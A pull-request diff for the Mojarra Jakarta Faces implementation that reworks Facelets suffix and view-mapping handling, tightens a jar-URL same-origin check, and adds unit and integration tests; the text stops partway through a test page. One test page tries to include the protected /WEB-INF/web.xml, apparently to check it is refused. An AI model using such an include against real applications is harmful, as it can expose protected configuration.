### PR TITLE
Sort out FACELETS_SUFFIX and FACELETS_VIEW_MAPPINGS semantics

### DIFF
--- a/impl/src/main/java/com/sun/faces/application/ApplicationAssociate.java
+++ b/impl/src/main/java/com/sun/faces/application/ApplicationAssociate.java
@@ -17,7 +17,6 @@
 package com.sun.faces.application;
 
 import static com.sun.faces.RIConstants.FACES_CONFIG_VERSION;
-import static com.sun.faces.RIConstants.FACES_PREFIX;
 import static com.sun.faces.config.WebConfiguration.BooleanWebContextInitParameter.AutomaticExtensionlessMapping;
 import static com.sun.faces.config.WebConfiguration.BooleanWebContextInitParameter.FaceletsSkipComments;
 import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.FaceletsDecorators;
@@ -31,6 +30,7 @@ import static com.sun.faces.util.Util.getFacesServletRegistration;
 import static com.sun.faces.util.Util.split;
 import static jakarta.faces.FactoryFinder.FACELET_CACHE_FACTORY;
 import static jakarta.faces.FactoryFinder.FLOW_HANDLER_FACTORY;
+import static jakarta.faces.FactoryFinder.VIEW_DECLARATION_LANGUAGE_FACTORY;
 import static jakarta.faces.application.ProjectStage.Development;
 import static jakarta.faces.application.ViewVisitOption.RETURN_AS_MINIMAL_IMPLICIT_OUTCOME;
 import static java.util.Collections.emptyList;
@@ -68,6 +68,7 @@ import jakarta.faces.event.SystemEvent;
 import jakarta.faces.event.SystemEventListener;
 import jakarta.faces.flow.FlowHandler;
 import jakarta.faces.flow.FlowHandlerFactory;
+import jakarta.faces.view.ViewDeclarationLanguageFactory;
 import jakarta.faces.view.facelets.FaceletCache;
 import jakarta.faces.view.facelets.FaceletCacheFactory;
 import jakarta.faces.view.facelets.TagDecorator;
@@ -303,14 +304,11 @@ public class ApplicationAssociate {
                 LOGGER.log(SEVERE, null, ex);
             }
 
-            // cause the Facelet VDL to be instantiated eagerly, so it can
-            // become aware of the resource library contracts
+            // Instantiate every view declaration language eagerly, so that the Facelets one
+            // becomes aware of the resource library contracts.
+            ((ViewDeclarationLanguageFactory) FactoryFinder.getFactory(VIEW_DECLARATION_LANGUAGE_FACTORY)).getAllViewDeclarationLanguages();
 
             ViewHandler viewHandler = context.getApplication().getViewHandler();
-
-            // FindBugs: ignore the return value, this is just to get the
-            // ctor called at this time.
-            viewHandler.getViewDeclarationLanguage(context, FACES_PREFIX + "xhtml");
 
             String facesConfigVersion = getFacesConfigXmlVersion(context);
             context.getExternalContext().getApplicationMap().put(FACES_CONFIG_VERSION, facesConfigVersion);

--- a/impl/src/main/java/com/sun/faces/application/view/FaceletViewHandlingStrategy.java
+++ b/impl/src/main/java/com/sun/faces/application/view/FaceletViewHandlingStrategy.java
@@ -46,7 +46,6 @@ import static jakarta.faces.application.Resource.COMPONENT_RESOURCE_KEY;
 import static jakarta.faces.application.StateManager.IS_BUILDING_INITIAL_STATE;
 import static jakarta.faces.application.StateManager.STATE_SAVING_METHOD_CLIENT;
 import static jakarta.faces.application.ViewHandler.CHARACTER_ENCODING_KEY;
-import static jakarta.faces.application.ViewHandler.DEFAULT_FACELETS_SUFFIX;
 import static jakarta.faces.application.ViewVisitOption.RETURN_AS_MINIMAL_IMPLICIT_OUTCOME;
 import static jakarta.faces.component.UIComponent.BEANINFO_KEY;
 import static jakarta.faces.component.UIComponent.COMPOSITE_FACET_NAME;
@@ -164,8 +163,8 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
 
     private DefaultFaceletFactory faceletFactory;
 
-    // Array of viewId extensions that should be handled by Facelets
-    private String[] extensionsArray;
+    // Array of suffixes which identify a resource as a Facelet
+    private String[] faceletResourceSuffixes;
 
     // Array of viewId prefixes that should be handled by Facelets
     private String[] prefixesArray;
@@ -826,11 +825,11 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
 
     /**
      * @param viewId the view ID to check
-     * @return <code>true</code> if assuming a default configuration and the view ID's extension in {@link ViewHandler#FACELETS_SUFFIX_PARAM_NAME}
-     * Otherwise try to match the view ID based on the configured extensions and prefixes in {@link ViewHandler#FACELETS_VIEW_MAPPINGS_PARAM_NAME}
+     * @return <code>true</code> if the view ID carries one of the suffixes which identify a Facelet, or matches one of
+     * the prefixes configured in {@link ViewHandler#FACELETS_VIEW_MAPPINGS_PARAM_NAME}, or is exact mapped to the
+     * {@code FacesServlet}.
      *
-     * @see com.sun.faces.config.WebConfiguration.WebContextInitParameter#FaceletsSuffix
-     * @see com.sun.faces.config.WebConfiguration.WebContextInitParameter#FaceletsViewMappings
+     * @see com.sun.faces.config.WebConfiguration#getFaceletResourceSuffixes()
      */
     @Override
     public boolean handlesViewId(String viewId) {
@@ -903,13 +902,14 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
      * Initialize mappings, during the first request.
      */
     protected void initializeMappings() {
+        faceletResourceSuffixes = webConfig.getFaceletResourceSuffixes();
+
         String viewMappings = webConfig.getOptionValue(FaceletsViewMappings);
         if (viewMappings != null && viewMappings.length() > 0) {
             Map<String, Object> appMap = FacesContext.getCurrentInstance().getExternalContext().getApplicationMap();
 
             String[] mappingsArray = split(appMap, viewMappings, ";");
 
-            List<String> extensionsList = new ArrayList<>(mappingsArray.length);
             List<String> prefixesList = new ArrayList<>(mappingsArray.length);
 
             for (String aMappingsArray : mappingsArray) {
@@ -919,15 +919,10 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
                     continue;
                 }
 
-                if (mapping.charAt(0) == '*') {
-                    extensionsList.add(mapping.substring(1));
-                } else if (mapping.charAt(mappingLength - 1) == '*') {
+                if (mapping.charAt(mappingLength - 1) == '*' && mapping.charAt(0) != '*') {
                     prefixesList.add(mapping.substring(0, mappingLength - 1));
                 }
             }
-
-            extensionsArray = new String[extensionsList.size()];
-            extensionsList.toArray(extensionsArray);
 
             prefixesArray = new String[prefixesList.size()];
             prefixesList.toArray(prefixesArray);
@@ -1163,18 +1158,8 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
             return true;
         }
 
-        // If there's no extensions array or prefixes array, then assume defaults.
-        // .xhtml extension is handled by the FaceletViewHandler
-        if (extensionsArray == null && prefixesArray == null) {
-            return isMatchedWithFaceletsSuffix(viewId) ? true : viewId.endsWith(DEFAULT_FACELETS_SUFFIX);
-        }
-
-        if (extensionsArray != null) {
-            for (String extension : extensionsArray) {
-                if (viewId.endsWith(extension)) {
-                    return true;
-                }
-            }
+        if (getMatchedFaceletResourceSuffix(viewId) != null) {
+            return true;
         }
 
         if (prefixesArray != null) {
@@ -1984,20 +1969,8 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
         return faceletFactory;
     }
 
-    private boolean isMatchedWithFaceletsSuffix(String viewId) {
-        String[] defaultsuffixes = webConfig.getOptionValue(WebConfiguration.WebContextInitParameter.FaceletsSuffix, " ");
-        for (String suffix : defaultsuffixes) {
-            if (viewId.endsWith(suffix)) {
-                return true;
-            }
-        }
-
-        return false;
-    }
-
-    private String getMatchedWithFaceletsSuffix(String viewId) {
-        String[] defaultsuffixes = webConfig.getOptionValue(WebConfiguration.WebContextInitParameter.FaceletsSuffix, " ");
-        for (String suffix : defaultsuffixes) {
+    private String getMatchedFaceletResourceSuffix(String viewId) {
+        for (String suffix : faceletResourceSuffixes) {
             if (viewId.endsWith(suffix)) {
                 return suffix;
             }
@@ -2049,26 +2022,7 @@ public class FaceletViewHandlingStrategy extends ViewHandlingStrategy {
                 return FLOW_DEFINITION_ID_SUFFIX;
             }
 
-            // If there's no extensions array or prefixes array, then assume defaults.
-            // .xhtml extension is handled by the FaceletViewHandler
-            if (extensionsArray == null && prefixesArray == null) {
-                String suffix = getMatchedWithFaceletsSuffix(viewId);
-                if (suffix != null) {
-                    return suffix;
-                }
-
-                if (viewId.endsWith(DEFAULT_FACELETS_SUFFIX)) {
-                    return DEFAULT_FACELETS_SUFFIX;
-                }
-            }
-
-            if (extensionsArray != null) {
-                for (String extension : extensionsArray) {
-                    if (viewId.endsWith(extension)) {
-                        return extension;
-                    }
-                }
-            }
+            return getMatchedFaceletResourceSuffix(viewId);
         }
 
         return null;

--- a/impl/src/main/java/com/sun/faces/application/view/MultiViewHandler.java
+++ b/impl/src/main/java/com/sun/faces/application/view/MultiViewHandler.java
@@ -498,29 +498,38 @@ public class MultiViewHandler extends ViewHandler {
      * Adjust the viewID per the requirements of {@link #renderView}.
      * </p>
      *
+     * <p>
+     * {@link ViewHandler#FACELETS_SUFFIX_PARAM_NAME} takes a space separated list, of which the first extension
+     * whose physical resource exists wins. When none exists the first configured extension is returned, so that a
+     * genuine not-found still yields a usable view ID for the error path.
+     * </p>
+     *
      * @param context current {@link jakarta.faces.context.FacesContext}
      * @param viewId incoming view ID
      * @return the view ID with an altered suffix mapping (if necessary)
      */
     protected String convertViewId(FacesContext context, String viewId) {
-
-        // if the viewId doesn't already use the above suffix,
-        // replace or append.
-        int extIdx = viewId.lastIndexOf('.');
+        int lastDot = viewId.lastIndexOf('.');
+        int extIdx = lastDot > viewId.lastIndexOf('/') ? lastDot : -1;
         int length = viewId.length();
         StringBuilder buffer = new StringBuilder(length);
+        boolean singleExtension = configuredExtensions.size() == 1;
+        String firstCandidateViewId = null;
 
-        for (String ext : configuredExtensions) {
-            if (viewId.endsWith(ext)) {
-                return viewId;
+        for (String extension : configuredExtensions) {
+            appendOrReplaceExtension(viewId, extension, length, extIdx, buffer);
+            String candidateViewId = buffer.toString();
+
+            if (singleExtension || getViewDeclarationLanguage(context, candidateViewId).viewExists(context, candidateViewId)) {
+                return candidateViewId;
             }
 
-            appendOrReplaceExtension(viewId, ext, length, extIdx, buffer);
-
-            return buffer.toString();
+            if (firstCandidateViewId == null) {
+                firstCandidateViewId = candidateViewId;
+            }
         }
 
-        return viewId;
+        return firstCandidateViewId != null ? firstCandidateViewId : viewId;
     }
 
     protected Map<String, List<String>> getFullParameterList(FacesContext ctx, String viewId, Map<String, List<String>> existingParameters) {

--- a/impl/src/main/java/com/sun/faces/application/view/MultiViewHandler.java
+++ b/impl/src/main/java/com/sun/faces/application/view/MultiViewHandler.java
@@ -92,7 +92,7 @@ public class MultiViewHandler extends ViewHandler {
     public MultiViewHandler() {
         WebConfiguration config = WebConfiguration.getInstance();
 
-        configuredExtensions = config.getConfiguredExtensions();
+        configuredExtensions = config.getFaceletsSuffixes();
         vdlFactory = (ViewDeclarationLanguageFactory) FactoryFinder.getFactory(VIEW_DECLARATION_LANGUAGE_FACTORY);
         protectedViews = new CopyOnWriteArraySet<>();
     }

--- a/impl/src/main/java/com/sun/faces/config/WebConfiguration.java
+++ b/impl/src/main/java/com/sun/faces/config/WebConfiguration.java
@@ -21,7 +21,9 @@ import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.Face
 import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.FaceletsViewMappings;
 import static com.sun.faces.util.Util.split;
 import static java.util.Arrays.asList;
+import static java.util.Arrays.stream;
 import static java.util.Collections.emptyMap;
+import static java.util.function.Predicate.not;
 import static java.util.logging.Level.FINE;
 import static java.util.regex.Pattern.CASE_INSENSITIVE;
 import static java.util.regex.Pattern.compile;
@@ -283,7 +285,7 @@ public class WebConfiguration {
                 result = new String[0];
             } else {
                 Map<String, Object> appMap = FacesContext.getCurrentInstance().getExternalContext().getApplicationMap();
-                result = split(appMap, value, sep);
+                result = stream(split(appMap, value, sep)).map(String::trim).filter(not(String::isEmpty)).toArray(String[]::new);
             }
             cachedListParams.put(param, result);
         }

--- a/impl/src/main/java/com/sun/faces/config/WebConfiguration.java
+++ b/impl/src/main/java/com/sun/faces/config/WebConfiguration.java
@@ -18,6 +18,7 @@
 package com.sun.faces.config;
 
 import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.FaceletsSuffix;
+import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.FaceletsViewMappings;
 import static com.sun.faces.util.Util.split;
 import static java.util.Arrays.asList;
 import static java.util.Collections.emptyMap;
@@ -329,14 +330,50 @@ public class WebConfiguration {
     }
 
     /**
-     * @return the facelet suffixes.
+     * Returns exactly the configured {@link ViewHandler#FACELETS_SUFFIX_PARAM_NAME} values, deduplicated and in
+     * declaration order. When the webapp does not declare that parameter this is
+     * {@link ViewHandler#DEFAULT_FACELETS_SUFFIX} alone.
+     * <p>
+     * These are the suffixes a view ID may carry, so this answers <em>which physical resource an incoming request may
+     * resolve to</em> and is what {@code deriveViewId} builds its candidate view IDs from. It is deliberately
+     * narrower than {@link #getFaceletResourceSuffixes()}: declaring the parameter replaces the default rather than
+     * adding to it, so a webapp declaring {@code .page} makes {@code /foo.xhtml} unreachable as a view even though
+     * the file is still a Facelet.
+     *
+     * @return the configured Facelets suffixes.
      */
-    public List<String> getConfiguredExtensions() {
+    public List<String> getFaceletsSuffixes() {
         String[] faceletsSuffix = getOptionValue(FaceletsSuffix, " ");
 
         Set<String> deduplicatedFaceletsSuffixes = new LinkedHashSet<>(asList(faceletsSuffix));
 
         return new ArrayList<>(deduplicatedFaceletsSuffixes);
+    }
+
+    /**
+     * Returns the suffixes which identify a resource as a Facelet, being the union of
+     * {@link #getFaceletsSuffixes()}, the extension entries of
+     * {@link ViewHandler#FACELETS_VIEW_MAPPINGS_PARAM_NAME}, and always
+     * {@link ViewHandler#DEFAULT_FACELETS_SUFFIX}, in that precedence order.
+     * <p>
+     * This answers <em>whether a resource is a Facelet at all</em>, which is a wider question than whether it is
+     * reachable as a view. A template or an included fragment is a Facelet without ever being requested, so the
+     * default suffix stays in this set even when the webapp declares another view suffix, and an extension declared
+     * through the view mappings joins it.
+     *
+     * @return the suffixes which identify a resource as a Facelet, deduplicated and in precedence order.
+     */
+    public String[] getFaceletResourceSuffixes() {
+        Set<String> faceletResourceSuffixes = new LinkedHashSet<>(getFaceletsSuffixes());
+        faceletResourceSuffixes.add(ViewHandler.DEFAULT_FACELETS_SUFFIX);
+
+        for (String viewMapping : getOptionValue(FaceletsViewMappings, ";")) {
+            if (viewMapping.length() > 1 && viewMapping.charAt(0) == '*') {
+                faceletResourceSuffixes.add(viewMapping.substring(1));
+            }
+        }
+
+        return faceletResourceSuffixes.toArray(String[]::new);
     }
 
     public void overrideContextInitParameter(WebContextInitParameter param, String value) {

--- a/impl/src/main/java/com/sun/faces/facelets/impl/DefaultFaceletFactory.java
+++ b/impl/src/main/java/com/sun/faces/facelets/impl/DefaultFaceletFactory.java
@@ -87,7 +87,7 @@ public class DefaultFaceletFactory {
     private ResourceManager manager;
     private URL baseUrl;
     private String baseUrlAsString;
-    private List<String> faceletsSuffixes;
+    private String[] faceletResourceSuffixes;
     private long refreshPeriodInMillis;
     private FaceletCache<DefaultFacelet> cache;
     private ConcurrentMap<String, FaceletCache<DefaultFacelet>> cachePerContract;
@@ -113,7 +113,7 @@ public class DefaultFaceletFactory {
         this.manager = ApplicationAssociate.getInstance(externalContext).getResourceManager();
         baseUrl = resolver.resolveUrl("/");
         baseUrlAsString = baseUrl.toExternalForm();
-        faceletsSuffixes = config.getConfiguredExtensions();
+        faceletResourceSuffixes = config.getFaceletResourceSuffixes();
         this.idMappers = config.isOptionEnabled(UseFaceletsID) ? null : new Cache<>(new IdMapperFactory());
         this.refreshPeriodInMillis = refreshPeriodInSeconds >= 0 ? refreshPeriodInSeconds * 1000 : -1;
         if (log.isLoggable(Level.FINE)) {
@@ -202,7 +202,7 @@ public class DefaultFaceletFactory {
 
     private void requireFaceletResource(URL url, String path) throws FacesFileNotFoundException {
         String resourcePath = url.getPath();
-        for (String suffix : faceletsSuffixes) {
+        for (String suffix : faceletResourceSuffixes) {
             if (resourcePath.endsWith(suffix)) {
                 return;
             }

--- a/impl/src/main/java/com/sun/faces/facelets/impl/DefaultFaceletFactory.java
+++ b/impl/src/main/java/com/sun/faces/facelets/impl/DefaultFaceletFactory.java
@@ -78,6 +78,9 @@ public class DefaultFaceletFactory {
 
     protected final static Logger log = FacesLogger.FACELETS_FACTORY.getLogger();
 
+    private static final String ARCHIVE_PROTOCOL = "jar";
+    private static final String ARCHIVE_SEPARATOR = "!/";
+
     private Compiler compiler;
 
     // We continue to use a ResourceResolver just in case someone
@@ -189,7 +192,7 @@ public class DefaultFaceletFactory {
     }
 
     private void requireSameOrigin(URL source, URL url, String path) throws FacesFileNotFoundException {
-        if (!url.getProtocol().equals(source.getProtocol()) || !Objects.equals(url.getAuthority(), source.getAuthority())) {
+        if (!url.getProtocol().equals(source.getProtocol()) || !Objects.equals(getOrigin(url), getOrigin(source))) {
             throw new FacesFileNotFoundException(path + " must be a relative path within the application");
         }
     }
@@ -198,6 +201,23 @@ public class DefaultFaceletFactory {
         if (url.getProtocol().equals(baseUrl.getProtocol()) && !url.toExternalForm().startsWith(baseUrlAsString)) {
             throw new FacesFileNotFoundException(path + " is not within the application root");
         }
+    }
+
+    /**
+     * A nested scheme carries no authority: every {@code jar:} URL has a null one, so a remote archive would compare
+     * equal to the local archive holding the facelet. The archive a resource lives in is therefore its origin.
+     *
+     * @return the origin to compare a resolved URL against the facelet it was resolved from.
+     */
+    private static String getOrigin(URL url) {
+        if (!ARCHIVE_PROTOCOL.equals(url.getProtocol())) {
+            return url.getAuthority();
+        }
+
+        String form = url.toExternalForm();
+        int separator = form.indexOf(ARCHIVE_SEPARATOR);
+
+        return separator == -1 ? form : form.substring(0, separator + ARCHIVE_SEPARATOR.length());
     }
 
     private void requireFaceletResource(URL url, String path) throws FacesFileNotFoundException {

--- a/impl/src/test/java/com/sun/faces/application/view/FaceletViewHandlingStrategyTest.java
+++ b/impl/src/test/java/com/sun/faces/application/view/FaceletViewHandlingStrategyTest.java
@@ -22,6 +22,7 @@ import static org.mockito.Mockito.mock;
 import static org.mockito.Mockito.mockStatic;
 import static org.mockito.Mockito.when;
 
+import java.lang.reflect.Field;
 import java.lang.reflect.Method;
 import java.util.ArrayList;
 import java.util.HashMap;
@@ -155,5 +156,70 @@ class FaceletViewHandlingStrategyTest {
         assertTrue(viewRoot.visited, "reapplyDynamicActions did not index the view despite having a dynamic action");
         assertTrue(viewRoot.hints.contains(VisitHint.SKIP_ITERATION),
                 "reapplyDynamicActions indexed the view with a visit which iterates rows");
+    }
+
+    // --- handlesByPrefixOrSuffix ---
+
+    /**
+     * Asks whether Facelets handles the given view ID, for a strategy configured with the given Facelet resource
+     * suffixes and view mapping prefixes. The real constructor reads both from the web configuration, which is not
+     * what these tests vary, so they are planted directly.
+     */
+    private static boolean handles(String viewId, String[] faceletResourceSuffixes, String[] prefixes) throws Exception {
+        FaceletViewHandlingStrategy strategy = mock(FaceletViewHandlingStrategy.class);
+        setField(strategy, "faceletResourceSuffixes", faceletResourceSuffixes);
+        setField(strategy, "prefixesArray", prefixes);
+
+        Method handlesByPrefixOrSuffix = FaceletViewHandlingStrategy.class
+                .getDeclaredMethod("handlesByPrefixOrSuffix", String.class);
+        handlesByPrefixOrSuffix.setAccessible(true);
+
+        return (boolean) handlesByPrefixOrSuffix.invoke(strategy, viewId);
+    }
+
+    private static void setField(Object target, String name, Object value) throws Exception {
+        Field field = FaceletViewHandlingStrategy.class.getDeclaredField(name);
+        field.setAccessible(true);
+        field.set(target, value);
+    }
+
+    @Test
+    void handlesAViewIdCarryingAConfiguredSuffix() throws Exception {
+        assertTrue(handles("/foo.xhtml", new String[] { ".xhtml" }, null));
+        assertTrue(handles("/foo.page", new String[] { ".page", ".xhtml" }, null));
+    }
+
+    @Test
+    void doesNotHandleAViewIdCarryingNoConfiguredSuffix() throws Exception {
+        assertFalse(handles("/foo.jsp", new String[] { ".xhtml" }, null));
+        assertFalse(handles("/foo", new String[] { ".xhtml" }, null));
+    }
+
+    /**
+     * A view mapping prefix widens what Facelets handles, so a view ID below it is handled whatever suffix it
+     * carries.
+     */
+    @Test
+    void handlesAViewIdBelowAConfiguredPrefix() throws Exception {
+        assertTrue(handles("/faces/foo.tpl", new String[] { ".xhtml" }, new String[] { "/faces/" }));
+        assertFalse(handles("/other/foo.tpl", new String[] { ".xhtml" }, new String[] { "/faces/" }));
+    }
+
+    /**
+     * Declaring view mappings must not take the Facelet suffixes out of play: both widen the set of view IDs which
+     * Facelets handles and neither withdraws what the other admits. The runtime resolves a view ID carrying the
+     * default suffix during startup, so a strategy which stops answering for it fails the whole deployment.
+     *
+     * @see https://github.com/eclipse-ee4j/mojarra/issues/5920
+     */
+    @Test
+    void handlesAConfiguredSuffixWhenViewMappingsAreDeclaredToo() throws Exception {
+        assertTrue(handles("/foo.xhtml", new String[] { ".xhtml" }, new String[] { "/faces/" }));
+        assertTrue(handles("com.sun.faces.xhtml", new String[] { ".xhtml" }, new String[] { "/faces/" }));
+    }
+
+    @Test
+    void handlesAFlowDefinitionRegardlessOfConfiguration() throws Exception {
+        assertTrue(handles("/foo-flow.xml", new String[] { ".xhtml" }, null));
     }
 }

--- a/impl/src/test/java/com/sun/faces/application/view/MultiViewHandlerTest.java
+++ b/impl/src/test/java/com/sun/faces/application/view/MultiViewHandlerTest.java
@@ -16,6 +16,7 @@
 
 package com.sun.faces.application.view;
 
+import static com.sun.faces.config.WebConfiguration.WebContextInitParameter.FaceletsSuffix;
 import static jakarta.servlet.http.MappingMatch.EXACT;
 import static jakarta.servlet.http.MappingMatch.EXTENSION;
 import static jakarta.servlet.http.MappingMatch.PATH;
@@ -25,6 +26,7 @@ import static org.junit.jupiter.api.Assertions.assertThrows;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 
+import com.sun.faces.config.WebConfiguration;
 import com.sun.faces.junit.JUnitFacesTestCaseBase;
 import com.sun.faces.mock.MockFacesMappingSupport;
 
@@ -92,4 +94,56 @@ public class MultiViewHandlerTest extends JUnitFacesTestCaseBase {
         facesContext.setExternalContext(externalContext);
         MockFacesMappingSupport.setFacesServletMappings(servletContext, servletMappings);
     }
+
+    // --- convertViewId ---
+
+    /**
+     * Builds a view handler whose configured Facelets suffixes are the given ones. The suffixes are read once, when
+     * the view handler is constructed, so the parameter has to be in place before that.
+     */
+    private MultiViewHandler viewHandlerWithFaceletsSuffixes(String faceletsSuffixes) {
+        WebConfiguration.getInstance(servletContext).overrideContextInitParameter(FaceletsSuffix, faceletsSuffixes);
+
+        return new MultiViewHandler();
+    }
+
+    @Test
+    public void convertViewIdReplacesAnyExtensionWithTheConfiguredOne() {
+        MultiViewHandler handler = viewHandlerWithFaceletsSuffixes(".xhtml");
+
+        assertEquals("/foo.xhtml", handler.convertViewId(facesContext, "/foo.jsf"));
+        assertEquals("/foo.xhtml", handler.convertViewId(facesContext, "/foo.xhtml"));
+    }
+
+    @Test
+    public void convertViewIdAppendsWhenTheViewIdCarriesNoExtension() {
+        MultiViewHandler handler = viewHandlerWithFaceletsSuffixes(".xhtml");
+
+        assertEquals("/foo.xhtml", handler.convertViewId(facesContext, "/foo"));
+    }
+
+    /**
+     * Only the last dot separates the extension, so a dot in a directory segment must be left alone.
+     */
+    @Test
+    public void convertViewIdIgnoresADotInADirectorySegment() {
+        MultiViewHandler handler = viewHandlerWithFaceletsSuffixes(".xhtml");
+
+        assertEquals("/a.b/foo.xhtml", handler.convertViewId(facesContext, "/a.b/foo.jsf"));
+        assertEquals("/a.b/foo.xhtml", handler.convertViewId(facesContext, "/a.b/foo"));
+    }
+
+    /**
+     * A single configured suffix admits no alternative, so the candidate is returned without consulting the physical
+     * resource, which keeps the common case free of that lookup.
+     *
+     * @see https://github.com/eclipse-ee4j/mojarra/issues/5918
+     */
+    @Test
+    public void convertViewIdReturnsTheOnlyCandidateWhenOneSuffixIsConfigured() {
+        MultiViewHandler handler = viewHandlerWithFaceletsSuffixes(".page");
+
+        assertEquals("/foo.page", handler.convertViewId(facesContext, "/foo.jsf"));
+    }
+
 }

--- a/test/issue5918/pom.xml
+++ b/test/issue5918/pom.xml
@@ -1,0 +1,43 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>org.eclipse.mojarra.test</groupId>
+        <artifactId>pom</artifactId>
+        <version>4.0.23-SNAPSHOT</version>
+    </parent>
+
+    <artifactId>issue5918</artifactId>
+    <packaging>war</packaging>
+
+    <name>Mojarra ${project.version} - INTEGRATION TESTS - ${project.artifactId}</name>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.eclipse.mojarra.test</groupId>
+            <artifactId>base</artifactId>
+            <version>${project.version}</version>
+            <scope>test</scope>
+        </dependency>
+    </dependencies>
+
+</project>

--- a/test/issue5918/src/main/webapp/WEB-INF/web.xml
+++ b/test/issue5918/src/main/webapp/WEB-INF/web.xml
@@ -1,0 +1,47 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<web-app
+    xmlns="https://jakarta.ee/xml/ns/jakartaee"
+    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+    xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_6_0.xsd"
+    version="6.0"
+>
+    <context-param>
+        <param-name>jakarta.faces.FACELETS_SUFFIX</param-name>
+        <param-value>.page  .html</param-value>
+    </context-param>
+    <context-param>
+        <param-name>jakarta.faces.FACELETS_VIEW_MAPPINGS</param-name>
+        <param-value>*.page</param-value>
+    </context-param>
+
+    <servlet>
+        <servlet-name>facesServlet</servlet-name>
+        <servlet-class>jakarta.faces.webapp.FacesServlet</servlet-class>
+        <load-on-startup>1</load-on-startup>
+    </servlet>
+    <servlet-mapping>
+        <servlet-name>facesServlet</servlet-name>
+        <url-pattern>*.jsf</url-pattern>
+    </servlet-mapping>
+
+    <session-config>
+        <tracking-mode>COOKIE</tracking-mode>
+    </session-config>
+</web-app>

--- a/test/issue5918/src/main/webapp/defaultSuffixInclude.page
+++ b/test/issue5918/src/main/webapp/defaultSuffixInclude.page
@@ -1,0 +1,29 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en"
+    xmlns:h="jakarta.faces.html"
+    xmlns:ui="jakarta.faces.facelets"
+>
+    <h:head>
+        <title>defaultSuffixInclude</title>
+    </h:head>
+    <h:body>
+        <ui:include src="fragment.xhtml" />
+    </h:body>
+</html>

--- a/test/issue5918/src/main/webapp/descriptorInclude.page
+++ b/test/issue5918/src/main/webapp/descriptorInclude.page
@@ -1,0 +1,29 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en"
+    xmlns:h="jakarta.faces.html"
+    xmlns:ui="jakarta.faces.facelets"
+>
+    <h:head>
+        <title>descriptorInclude</title>
+    </h:head>
+    <h:body>
+        <ui:include src="/WEB-INF/web.xml" />
+    </h:body>
+</html>

--- a/test/issue5918/src/main/webapp/firstSuffix.page
+++ b/test/issue5918/src/main/webapp/firstSuffix.page
@@ -1,0 +1,26 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:head>
+        <title>firstSuffix</title>
+    </h:head>
+    <h:body>
